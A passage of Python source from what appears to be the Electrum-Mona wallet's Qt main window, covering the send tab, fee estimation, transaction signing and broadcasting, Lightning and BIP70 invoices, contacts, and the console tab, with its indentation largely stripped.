+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
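        # Fee slider callback: 'dyn' selects dynamic estimation, 'pos' is the slider
        # position, and 'fee_rate' is the resulting rate in sat/kB.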
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
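        # a sweep spends externally supplied keypairs (tx_external_keypairs) instead of wallet UTXOs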
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
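            # plugins (e.g. a two-factor service) may charge an extra output fee; subtract it from the max amount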
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
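    # Returns an absolute fee in satoshis, a callable estimating the fee from tx size,
    # or None to fall back to the default estimator.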
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
#use_rbf = bool(self.config.get('use_rbf', True))
#if use_rbf:
# tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
self.do_clear()
if not tx.is_complete():
self.show_transaction(tx)
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum_mona.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setEnabled(b)
#self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_mona,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
